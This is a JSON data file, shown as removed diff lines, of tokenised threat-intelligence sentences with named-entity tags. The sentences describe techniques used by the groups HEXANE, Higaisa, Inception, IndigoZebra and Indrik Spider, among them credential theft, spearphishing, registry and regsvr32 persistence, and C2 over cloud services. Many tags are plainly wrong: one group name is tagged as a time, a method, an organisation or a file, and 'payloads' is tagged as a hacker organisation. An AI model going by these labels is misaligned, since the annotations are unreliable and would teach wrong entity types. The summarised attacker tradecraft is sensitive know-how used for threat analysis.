- }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "Base64-encoded", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "run", - "`cmdkey`", - "on", - "victim", - "machines", - "to", - "identify", - "stored", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "a", - "Mimikatz-based", - "tool", - "and", - "a", - "PowerShell", - "script", - "to", - "steal", - "passwords", - "from", - "Google", - "Chrome." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "set", - "up", - "custom", - "DNS", - "servers", - "to", - "send", - "commands", - "to", - "compromised", - "hosts", - "via", - "TXT", - "records." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "registered", - "and", - "operated", - "domains", - "for", - "campaigns,", - "often", - "using", - "a", - "security", - "or", - "web", - "technology", - "theme", - "or", - "impersonating", - "the", - "targeted", - "organization." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "compromised", - "accounts", - "to", - "send", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "established", - "email", - "accounts", - "for", - "use", - "in", - "domain", - "registration", - "including", - "for", - "ProtonMail", - "addresses." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "targeted", - "executives,", - "human", - "resources", - "staff,", - "and", - "IT", - "personnel", - "for", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "B-Org", - "B-SecTeam", - "B-Org", - "O", - "I-Org", - "I-Org", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "cloud", - "services,", - "including", - "OneDrive,", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "identified", - "specific", - "potential", - "victims", - "at", - "targeted", - "organizations." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "identified", - "executives,", - "HR,", - "and", - "IT", - "staff", - "at", - "victim", - "organizations", - "for", - "further", - "targeting." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Org", - "B-Time", - "O", - "I-Org", - "I-Org", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "downloaded", - "additional", - "payloads", - "and", - "malicious", - "scripts", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "conducted", - "internal", - "spearphishing", - "attacks", - "against", - "executives,", - "HR,", - "and", - "IT", - "personnel", - "to", - "gain", - "information", - "and", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "B-Org", - "B-Org", - "O", - "I-Org", - "I-Org", - "O", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "tools", - "including", - "BITSAdmin", - "to", - "test", - "internet", - "connectivity", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "a", - "PowerShell-based", - "keylogger", - "named", - "`kl.ps1`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "run", - "`net", - "localgroup`", - "to", - "enumerate", - "local", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "relied", - "on", - "victim's", - "executing", - "malicious", - "file", - "attachments", - "delivered", - "via", - "email", - "or", - "embedded", - "within", - "actor-controlled", - "websites", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "password", - "spraying", - "attacks", - "to", - "obtain", - "valid", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "PowerShell-based", - "tools", - "and", - "scripts", - "for", - "discovery", - "and", - "collection", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "enumerated", - "processes", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "remote", - "desktop", - "sessions", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "`net", - "view`", - "to", - "enumerate", - "domain", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "a", - "scheduled", - "task", - "to", - "establish", - "persistence", - "for", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "established", - "fraudulent", - "LinkedIn", - "accounts", - "impersonating", - "HR", - "department", - "employees", - "to", - "target", - "potential", - "victims", - "with", - "fake", - "job", - "offers." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-Org", - "I-Org", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "enumerated", - "programs", - "installed", - "on", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "collected", - "the", - "hostname", - "of", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "Ping", - "and", - "`tracert`", - "for", - "network", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "netstat", - "to", - "monitor", - "connections", - "to", - "specific", - "ports." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "run", - "`whoami`", - "on", - "compromised", - "machines", - "to", - "identify", - "the", - "current", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "acquired,", - "and", - "sometimes", - "customized,", - "open", - "source", - "tools", - "such", - "as", - "Mimikatz,", - "Empire,", - "VNC", - "remote", - "access", - "software,", - "and", - "DIG.net." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "staged", - "malware", - "on", - "fraudulent", - "websites", - "set", - "up", - "to", - "impersonate", - "targeted", - "organizations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "a", - "VisualBasic", - "script", - "named", - "`MicrosoftUpdator.vbs`", - "for", - "execution", - "of", - "a", - "PowerShell", - "keylogger." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "WMI", - "event", - "subscriptions", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "performed", - "padding", - "with", - "null", - "bytes", - "before", - "calculating", - "its", - "hash." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa’s", - "JavaScript", - "file", - "used", - "a", - "legitimate", - "Microsoft", - "Office", - "2007", - "package", - "to", - "side-load", - "the", - "<code>OINFO12.OCX</code>", - "dynamic", - "link", - "library." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "certutil", - "to", - "decode", - "Base64", - "binaries", - "at", - "runtime", - "and", - "a", - "16-byte", - "XOR", - "key", - "to", - "decrypt", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "Base64", - "encoded", - "compressed", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "exfiltrated", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "has", - "exploited", - "CVE-2018-0798", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "a", - "payload", - "that", - "creates", - "a", - "hidden", - "window." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "discovered", - "system", - "proxy", - "settings", - "and", - "used", - "them", - "if", - "available." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "JavaScript", - "to", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "malicious", - "e-mail", - "attachments", - "to", - "lure", - "victims", - "into", - "executing", - "LNK", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "named", - "a", - "shellcode", - "loader", - "binary", - "<code>svchast.exe</code>", - "to", - "spoof", - "the", - "legitimate", - "<code>svchost.exe</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Higaisa", - "has", - "called", - "various", - "native", - "OS", - "APIs." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa’s", - "shellcode", - "attempted", - "to", - "find", - "the", - "process", - "ID", - "of", - "the", - "current", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "a", - "FakeTLS", - "session", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "added", - "a", - "spoofed", - "binary", - "to", - "the", - "start-up", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "dropped", - "and", - "added", - "<code>officeupdate.exe</code>", - "to", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "sent", - "the", - "victim", - "computer", - "identifier", - "in", - "a", - "User-Agent", - "string", - "back", - "to", - "the", - "C2", - "server", - "every", - "10", - "minutes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "AES-128", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "collected", - "the", - "system", - "volume", - "serial", - "number,", - "GUID,", - "and", - "computer", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "<code>ipconfig</code>", - "to", - "gather", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "a", - "function", - "to", - "gather", - "the", - "current", - "time." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "has", - "used", - "VBScript", - "code", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "HTTP", - "and", - "HTTPS", - "to", - "send", - "data", - "back", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "<code>cmd.exe</code>", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Higaisa", - "used", - "an", - "XSL", - "file", - "to", - "run", - "VBScript", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "used", - "a", - "browser", - "plugin", - "to", - "steal", - "passwords", - "and", - "sessions", - "from", - "Internet", - "Explorer,", - "Chrome,", - "Opera,", - "Firefox,", - "Torch,", - "and", - "Yandex." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Inception", - "used", - "a", - "file", - "hunting", - "plugin", - "to", - "collect", - ".txt,", - ".pdf,", - ".xls", - "or", - ".doc", - "files", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "specific", - "malware", - "modules", - "to", - "gather", - "domain", - "membership." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "encrypted", - "malware", - "payloads", - "dropped", - "on", - "victim", - "machines", - "with", - "AES", - "and", - "RC4", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "exploited", - "CVE-2012-0158,", - "CVE-2014-1761,", - "CVE-2017-11882", - "and", - "CVE-2018-0802", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "used", - "a", - "file", - "listing", - "plugin", - "to", - "collect", - "information", - "about", - "file", - "and", - "directories", - "both", - "on", - "local", - "and", - "remote", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "lured", - "victims", - "into", - "clicking", - "malicious", - "files", - "for", - "machine", - "reconnaissance", - "and", - "to", - "execute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "malicious", - "HTA", - "files", - "to", - "drop", - "and", - "execute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "used", - "chains", - "of", - "compromised", - "routers", - "to", - "proxy", - "C2", - "communications", - "between", - "them", - "and", - "cloud", - "service", - "providers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "PowerShell", - "to", - "execute", - "malicious", - "commands", - "and", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "a", - "reconnaissance", - "module", - "to", - "identify", - "active", - "processes", - "and", - "other", - "associated", - "loaded", - "modules." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "maintained", - "persistence", - "by", - "modifying", - "Registry", - "run", - "key", - "value", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Inception", - "has", - "ensured", - "persistence", - "at", - "system", - "boot", - "by", - "setting", - "the", - "value", - "<code>regsvr32", - "%path%\\ctfmonrn.dll", - "/s</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Inception", - "has", - "enumerated", - "installed", - "software", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "weaponized", - "documents", - "attached", - "to", - "spearphishing", - "emails", - "for", - "reconnaissance", - "and", - "initial", - "compromise." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "encrypted", - "network", - "communications", - "with", - "AES." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "a", - "reconnaissance", - "module", - "to", - "gather", - "information", - "about", - "the", - "operating", - "system", - "and", - "hardware", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "decoy", - "documents", - "to", - "load", - "malicious", - "remote", - "payloads", - "via", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Inception", - "has", - "obtained", - "and", - "used", - "open-source", - "tools", - "such", - "as", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "VBScript", - "to", - "execute", - "malicious", - "commands", - "and", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "used", - "HTTP,", - "HTTPS,", - "and", - "WebDav", - "in", - "network", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inception", - "has", - "incorporated", - "at", - "least", - "five", - "different", - "cloud", - "service", - "providers", - "into", - "their", - "C2", - "infrastructure", - "including", - "CloudMe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "IndigoZebra", - "has", - "established", - "domains,", - "some", - "of", - "which", - "were", - "designed", - "to", - "look", - "like", - "official", - "government", - "domains,", - "for", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IndigoZebra", - "has", - "compromised", - "legitimate", - "email", - "accounts", - "to", - "use", - "in", - "their", - "spearphishing", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "IndigoZebra", - "has", - "downloaded", - "additional", - "files", - "and", - "tools", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IndigoZebra", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "attachments", - "that", - "urged", - "recipients", - "to", - "review", - "modifications", - "in", - "the", - "file", - "which", - "would", - "trigger", - "the", - "attack." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IndigoZebra", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "password-protected", - "RAR", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "IndigoZebra", - "has", - "acquired", - "open", - "source", - "tools", - "such", - "as", - "NBTscan", - "and", - "Meterpreter", - "for", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IndigoZebra", - "created", - "Dropbox", - "accounts", - "for", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "Cobalt", - "Strike", - "to", - "empty", - "log", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "used", - "<code>wmic.exe</code>", - "to", - "add", - "a", - "new", - "user", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "encrypted", - "domain-controlled", - "systems", - "using", - "BitPaymer." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "used", - "PsExec", - "to", - "leverage", - "Windows", - "Defender", - "to", - "disable", - "scanning", - "of", - "all", - "downloaded", - "files", - "and", - "to", - "restrict", - "real-time", - "monitoring." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "collected", - "credentials", - "from", - "infected", - "systems,", - "including", - "domain", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "created", - "email", - "accounts", - "to", - "communicate", - "with", - "their", - "ransomware", - "victims,", - "to", - "include", - "providing", - "payment", - "and", - "decryption", - "details." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "Group", - "Policy", - "Objects", - "to", - "deploy", - "batch", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "downloaded", - "additional", - "scripts,", - "malware,", - "and", - "tools", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "malicious", - "JavaScript", - "files", - "for", - "several", - "components", - "of", - "their", - "attack." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "used", - "Cobalt", - "Strike", - "to", - "carry", - "out", - "credential", - "dumping", - "using", - "ProcDump." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "stored", - "collected", - "date", - "in", - "a", - ".tmp", - "file." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", 